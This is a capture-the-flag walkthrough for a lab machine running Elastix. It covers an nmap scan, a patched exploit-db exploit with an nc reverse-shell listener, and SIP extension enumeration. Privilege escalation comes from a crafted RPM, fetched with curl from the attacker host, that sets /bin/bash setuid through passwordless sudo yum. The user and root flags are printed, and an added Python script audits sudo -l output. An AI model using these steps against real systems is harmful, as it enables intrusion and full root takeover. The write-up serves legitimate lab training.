Service overview

The machine's IP address is 10.10.10.7. Let's look at the nmap output:

$ nmap -sV -sC -Pn -oN 10.10.10.7 10.10.10.7
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp    open  http       Apache httpd 2.2.3
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: USER IMPLEMENTATION(Cyrus POP3 server v2) TOP EXPIRE(NEVER) LOGIN-DELAY(0) AUTH-RESP-CODE RESP-CODES UIDL APOP PIPELINING STLS
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            875/udp   status
|_  100024  1            878/tcp   status
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: UIDPLUS LISTEXT OK URLAUTHA0001 STARTTLS X-NETSCAPE RENAME LIST-SUBSCRIBED ID SORT=MODSEQ CATENATE BINARY SORT ACL Completed NAMESPACE IMAP4rev1 IDLE CONDSTORE THREAD=REFERENCES MULTIAPPEND ANNOTATEMORE QUOTA THREAD=ORDEREDSUBJECT NO MAILBOX-REFERRALS LITERAL+ UNSELECT CHILDREN RIGHTS=kxte IMAP4 ATOMIC
443/tcp   open  ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2017-04-07T08:22:08
| Not valid after:  2018-04-07T08:22:08
| MD5:   621a 82b6 cf7e 1afa 5284 1c91 60c8 fbc8
|_SHA-1: 800a c6e7 065e 1198 0187 c452 0d9b 18ef e557 a09f
|_ssl-date: 2021-05-22T07:04:45+00:00; +2s from scanner time.
878/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-favicon: Unknown favicon MD5: 74F7F6F633A027FA3EA36F05004C9341
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix

Host script results:
|_clock-skew: 1s

Web service

We are greeted by Elastix.

Let's look for an exploit. There is one at https://www.exploit-db.com/exploits/18650, but to use it we need an existing username, and we also have to set the parameters MinProtocol = None and CipherString = DEFAULT in /etc/ssl/openssl.conf.

Let's patch the exploit:

import ssl
import urllib  # Python 2: urllib.urlopen accepts a context argument since 2.7.9

# The target presents a self-signed certificate, so hostname and chain
# verification are switched off for this request
ctxt = ssl.create_default_context()
ctxt.check_hostname = False
ctxt.verify_mode = ssl.CERT_NONE

url = ...

urllib.urlopen(url, context=ctxt)

SIP scan

Let's scan SIP extensions 1 to 500.

$ svwar -m INVITE -e1-500 10.10.10.7
+-----------+----------------+
| Extension | Authentication |
+===========+================+
| 233       | reqauth        |
+-----------+----------------+

In the exploit, change extension to 233, rhost to 10.10.10.7 and lhost to 10.10.16.93.

Run it:

rlwrap nc -lnvp 443
python2 exp.py 


User flag

find /home -name "*user.txt*"
/home/fanis/user.txt
cat /home/fanis/user.txt
d219362ccd047fb37287db33b240ab24

Privilege escalation

$ sudo -l
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG
    LC_ADDRESS LC_CTYPE LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER
    LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper

We can run yum as the superuser. Let's use the guide. The payload is in payload.sh:

#!/bin/bash
chmod u+s /bin/bash

Create an RPM package:

# on the local machine
$ sudo gem install fpm
$ fpm -n root -s dir -t rpm -a all --before-install payload.sh .
Created package {:path=>"root-1.0-1.noarch.rpm"}
$ python3 -m http.server 4443
# on the remote machine
$ curl http://10.10.16.93:4443/test/root-1.0-1.noarch.rpm -o root-1.0-1.noarch.rpm
$ sudo yum localinstall --disablerepo=* --nogpgcheck root-1.0-1.noarch.rpm
> yes
$ ls -la /bin/bash
-rwsr-xr-x 1 root root 729292 Jan 22  2009 /bin/bash
$ /bin/bash -p
$ id
uid=100(asterisk) gid=101(asterisk) euid=0(root)
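A defender-side check for the sudoers configuration above, as an added example that is not part of the original writeup: it parses the text `sudo -l` prints and flags every NOPASSWD root entry, noting why the ones this box exposes are dangerous. The function names, the RISKY table and the constructed SAMPLE are mine.

```python
"""Audit 'sudo -l' output for passwordless root entries. Added example, not part of
the original writeup; SAMPLE is constructed from the output above plus one
password-protected entry (constructed) to exercise the filter."""
import re

# Hardening notes for the entries this box exposes; anything else is flagged generically.
RISKY = {
    "/usr/bin/yum": "package manager: scriptlets of a local RPM run as root (used above)",
    "/bin/chmod": "sets any file mode, including the setuid bit payload.sh applies",
    "/bin/chown": "changes ownership of arbitrary files",
    "/bin/touch": "creates arbitrary files as root",
}
# '(runas) [TAG: ...] cmd[, cmd ...]' is the entry format 'sudo -l' prints.
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s+)*)(?P<cmds>.+?)\s*$")

def parse_sudo_l(text):
    """Return one dict per command listed after 'may run the following commands'."""
    entries, in_commands = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_commands = True
            continue
        m = ENTRY_RE.match(line) if in_commands else None
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()  # '(root)' or '(root : root)'
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):  # several commands may share one line
            entries.append({"runas": runas, "nopasswd": nopasswd, "cmd": cmd.split()[0]})
    return entries

def audit(text):
    """Return (cmd, reason) for every entry that runs as root without a password."""
    return [(e["cmd"], RISKY.get(e["cmd"], "passwordless root execution: review"))
            for e in parse_sudo_l(text) if e["runas"] == "root" and e["nopasswd"]]

SAMPLE = """\
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/chmod
    (root) /usr/sbin/postfix
"""

if __name__ == "__main__":
    for cmd, reason in audit(SAMPLE):
        print(f"{cmd}: {reason}")
```

Feed it the real output of `sudo -l` on a host (for example via `sys.stdin.read()`) to get the same report for an arbitrary sudoers policy.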

Root flag

cd /root
ls -la
total 16308
drwxr-x---  2 root root     4096 Jul 16  2019 .
drwxr-xr-x 22 root root     4096 Jul 29 22:51 ..
-rw-------  1 root root     6025 Apr  7  2017 anaconda-ks.cfg
-rw-------  1 root root     1186 Jul 29 21:52 .bash_history
-rw-r--r--  1 root root       24 Jan  6  2007 .bash_logout
-rw-r--r--  1 root root      191 Jan  6  2007 .bash_profile
-rw-r--r--  1 root root      176 Jan  6  2007 .bashrc
-rw-r--r--  1 root root      100 Jan  6  2007 .cshrc
-r-xr-xr-x  1 root root   190461 Aug 10  2011 elastix-pr-2.2-1.i386.rpm
-rw-r--r--  1 root root    18433 Apr  7  2017 install.log
-rw-r--r--  1 root root        0 Apr  7  2017 install.log.syslog
-rw-r--r--  1 root root        1 Apr  7  2017 postnochroot
-rw-------  1 root root       33 Jul 29 18:16 root.txt
-rw-r--r--  1 root root      129 Jan  6  2007 .tcshrc
-r-xr-xr-x  1 root root 16358730 Oct 31  2011 webmin-1.570-1.noarch.rpm
cat root.txt
47977ff7e1438d8ceeffb77ccf002bf2
